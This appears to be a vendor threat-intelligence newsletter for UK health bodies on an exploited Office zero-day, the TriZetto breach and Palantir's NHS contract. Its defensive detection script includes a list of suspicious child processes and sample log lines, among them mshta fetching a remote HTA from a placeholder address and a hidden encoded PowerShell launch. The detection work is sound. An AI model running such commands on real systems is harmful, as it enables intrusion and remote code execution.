
Threat Report 161

This week brings an actively exploited Microsoft Office zero-day, a major US healthcare data breach highlighting supply chain risks, and growing concerns about NHS supplier relationships with controversial organisations.

Microsoft Office Zero-Day Exploited

Microsoft has released an emergency patch for a security flaw in Office that is already being used to attack organisations. The vulnerability, tracked as CVE-2026-21509, lets an attacker bypass the security features that normally stop unsafe legacy COM and OLE controls from being activated from inside a document. COM and OLE, the mechanisms Office uses to embed and activate external components, have been abused in document-based attacks for many years. Exploitation requires tricking someone into opening a specially crafted file, such as a malicious Word document or Excel spreadsheet.

NHS organisations and healthcare suppliers rely heavily on Microsoft Office for clinical correspondence, patient records management and administrative workflows, so a compromised Office installation can give an attacker a foothold on a clinical workstation and, from there, access to sensitive patient information and critical systems. The exploit triggers when the file is opened rather than through the preview pane, so the attacker only needs to persuade a user to open an attachment. DSPT requires organisations to demonstrate that they apply security patches promptly; failing to patch a vulnerability that is already being exploited is both a compliance failure and a likely route to a data breach.

Recommendations
  • Apply Microsoft's emergency patch for CVE-2026-21509 immediately across all Office installations
  • For older Office versions (2016 and 2019) where a patch is not available, apply the registry workarounds published by Microsoft to block the vulnerable COM and OLE controls; test the change first, because it can break documents that legitimately embed objects, and record it so it can be reversed once a patch is installed
  • Review email filtering rules to block suspicious Office documents from unknown senders
  • Educate staff about the risks of opening unexpected email attachments, even from seemingly trusted sources
  • Monitor endpoints for unusual Office process behaviour, in particular Word, Excel or PowerPoint spawning command interpreters or script hosts, and for Office processes making unexpected outbound network connections
  • Add CVE-2026-21509 to your vulnerability management tracking
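One way to act on the monitoring recommendation, as an added example written for this report rather than code from Periculo or Microsoft: the script below runs Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) events through two checks, an Office process spawning a command interpreter, script host or living-off-the-land binary, and an Office process connecting outside an allow-list of expected destinations. The field names follow Sysmon's JSON export; the allow-list, the internal address ranges and the sample events are constructed assumptions to be tuned to your own estate.

```python
"""Detection logic for the Office monitoring recommendation above.

Added example, not code from the original report, Periculo or Microsoft.
Assumptions: events are Sysmon-style JSON lines using the field names of
Event ID 1 (process creation) and Event ID 3 (network connection); the
allow-list and internal ranges below are placeholders to be tuned.
"""
import ipaddress
import json
from pathlib import PureWindowsPath

# Office binaries that open user-supplied documents
OFFICE_PROCESSES = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe",
}

# Interpreters, script hosts and living-off-the-land binaries that a
# document-based exploit typically launches and that Office should never spawn
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "msiexec.exe", "bitsadmin.exe", "curl.exe",
}

# Destinations Office is expected to contact (assumption: adjust to your estate)
ALLOWED_DEST_SUFFIXES = (
    "office.com", "office365.com", "microsoft.com", "live.com",
    "windows.net", "nhs.net",
)

# RFC 1918 ranges treated as internal (assumption: add your own routed ranges)
INTERNAL_NETWORKS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def base_name(path: str) -> str:
    """Lower-case file name from a Windows path ('' if the path is empty)."""
    return PureWindowsPath(path).name.lower()


def destination_allowed(hostname: str) -> bool:
    """True if hostname is one of the allowed domains or a subdomain of one."""
    host = hostname.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in ALLOWED_DEST_SUFFIXES)


def is_internal(ip_text: str) -> bool:
    """True only for addresses inside the configured internal ranges."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # missing or malformed address: treat as external
    return any(ip in net for net in INTERNAL_NETWORKS)


def check_process_creation(ev: dict):
    """Event ID 1: an Office process launching a shell, script host or LOLBin."""
    parent = base_name(ev.get("ParentImage", ""))
    child = base_name(ev.get("Image", ""))
    if parent in OFFICE_PROCESSES and child in SUSPICIOUS_CHILDREN:
        return {
            "rule": "office_spawns_shell",
            "host": ev.get("Computer"),
            "user": ev.get("User"),
            "detail": f"{parent} -> {child}: {ev.get('CommandLine', '')}",
        }
    return None


def check_network_connection(ev: dict):
    """Event ID 3: an Office process connecting outside the expected destinations."""
    image = base_name(ev.get("Image", ""))
    if image not in OFFICE_PROCESSES:
        return None
    dst_ip = ev.get("DestinationIp", "")
    if is_internal(dst_ip):
        return None  # file shares, print servers etc. are out of scope here
    hostname = ev.get("DestinationHostname", "")
    if hostname and destination_allowed(hostname):
        return None
    return {
        "rule": "office_network_unexpected",
        "host": ev.get("Computer"),
        "user": ev.get("User"),
        "detail": f"{image} -> {hostname or '<no hostname>'} {dst_ip}:{ev.get('DestinationPort')}",
    }


CHECKS = {1: check_process_creation, 3: check_network_connection}


def analyse(log_text: str) -> list:
    """Run each JSON event line through the check for its EventID; return alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        check = CHECKS.get(ev.get("EventID"))
        alert = check(ev) if check else None
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events: Word dropping to cmd.exe and mshta.exe, benign Office
# activity, and a direct-to-IP connection from Word with no resolved hostname.
SAMPLE_LOG = r"""
{"EventID": 1, "Computer": "WS-0142", "User": "TRUST\\jsmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -w hidden -nop -enc ..."}
{"EventID": 1, "Computer": "WS-0142", "User": "TRUST\\jsmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"EventID": 1, "Computer": "WS-0142", "User": "TRUST\\jsmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n referral.docx"}
{"EventID": 3, "Computer": "WS-0142", "User": "TRUST\\jsmith", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "DestinationIp": "203.0.113.45", "DestinationPort": 443, "DestinationHostname": ""}
{"EventID": 3, "Computer": "WS-0142", "User": "TRUST\\jsmith", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "outlook.office365.com"}
{"EventID": 3, "Computer": "WS-0142", "User": "TRUST\\jsmith", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "DestinationIp": "10.20.30.40", "DestinationPort": 445, "DestinationHostname": "fileserver01.trust.local"}
{"EventID": 1, "Computer": "WS-0142", "User": "TRUST\\jsmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://203.0.113.45/update.hta"}
"""

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(f"[{alert['rule']}] {alert['host']} {alert['user']}: {alert['detail']}")
```

Run it as a script to print the alerts for the sample events, or pass `analyse()` the JSON lines exported from your SIEM. The network rule is noisy until the allow-list matches what your Office deployment actually talks to; the process rule is the one to page on, because Office launching cmd.exe or mshta.exe is almost never legitimate.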

Major US Healthcare Provider Data Breach Exposes Supply Chain Risks

TriZetto Provider Solutions, a major US insurance verification provider owned by Cognizant, has disclosed a data breach affecting more than 700,000 patients across several US states. Attackers gained unauthorised access to the company's systems in November 2024 but were not discovered until October 2025, giving them nearly a year of access to protected health information. The affected healthcare providers are in Oregon, Massachusetts, Oklahoma and California. TriZetto says it removed the attackers' access on 2 October 2025 and engaged Mandiant as external incident responders. According to Cognizant this was not a ransomware incident, but the stolen data included sensitive patient information such as names, dates of birth, medical record numbers and insurance details.

While this breach primarily affects US healthcare providers, it highlights critical supply chain security risks for UK health organisations and NHS suppliers. Many UK providers depend on international software and service vendors for administrative systems and back-office functions. The incident shows how third-party suppliers can be compromised for long periods without detection, exposing sensitive patient data. For UK organisations with international operations or US-based suppliers, this reinforces the need for robust vendor security assessments and ongoing monitoring. DSPT requires effective management of third-party risks, and incidents like this show why rigorous supplier due diligence is essential.

Recommendations
  • Review all third-party healthcare technology suppliers, particularly those handling patient data or providing administrative systems
  • Verify that suppliers undergo regular security assessments and penetration testing
  • Ensure contracts include clear data breach notification requirements and timelines for disclosure
  • Monitor supplier connections (VPNs, APIs, remote-support and service accounts) for unusual data access patterns, such as bulk record retrieval or access outside agreed hours
  • Conduct tabletop exercises that include supplier breach scenarios
  • For organisations with US operations or US-based suppliers, review HIPAA compliance status and incident response procedures
  • Consider implementing additional monitoring controls for supplier access to sensitive systems
  • Review DSPT supplier assurance requirements and ensure all suppliers meet necessary standards

Concerns Mount Over Major NHS Supplier's Links with US Immigration Enforcement

Reports emerged this month that Palantir Technologies, a major NHS data platform supplier under a £330 million contract, has developed tools for US Immigration and Customs Enforcement that use healthcare data to track individuals. The tool, called ELITE, reportedly uses Medicaid and other government data to create dossiers on potential deportation targets. Palantir holds the contract for the NHS Federated Data Platform, designed to bring together NHS data for improved patient care and operational efficiency. The company has faced ongoing scrutiny over its work with intelligence and security services, and concerns about data governance and the ethical implications of its contracts.

While Palantir's work with US immigration enforcement does not directly affect NHS data security, it raises important questions about supplier relationships and data governance that are relevant to DSPT compliance and public trust. NHS organisations are required to demonstrate robust data protection practices and appropriate oversight of suppliers. The controversy highlights the importance of understanding the full scope of major suppliers' activities, particularly those handling sensitive patient information. Public confidence in NHS data systems depends on transparent governance and ethical supplier relationships. Healthcare organisations should be aware of these concerns as they affect the reputation and trustworthiness of key technology partners, even when technical security measures are in place.

Recommendations
  • Review supplier contracts to ensure clear data governance provisions and ethical use clauses
  • Monitor public reporting and news about major technology suppliers to stay informed of reputational risks
  • Ensure supplier assurance processes include consideration of broader ethical and governance concerns
  • Maintain open communication with patients and stakeholders about how NHS data is managed and protected
  • Consider these factors as part of ongoing supplier risk assessments and contract renewal decisions
  • Document your organisation's approach to supplier oversight in DSPT evidence
  • Engage with NHS England guidance on supplier relationships and data platform adoption
  • Review your organisation's position on the Federated Data Platform and document the rationale for your approach

Protecting your organisation from cyber threats requires constant vigilance and expert knowledge. Periculo's Threat Intelligence services help UK businesses and digital health organisations stay informed about emerging risks and take action before incidents occur.

Contact us to learn how we can support your cybersecurity programme and help you maintain compliance with DSPT and other regulatory requirements.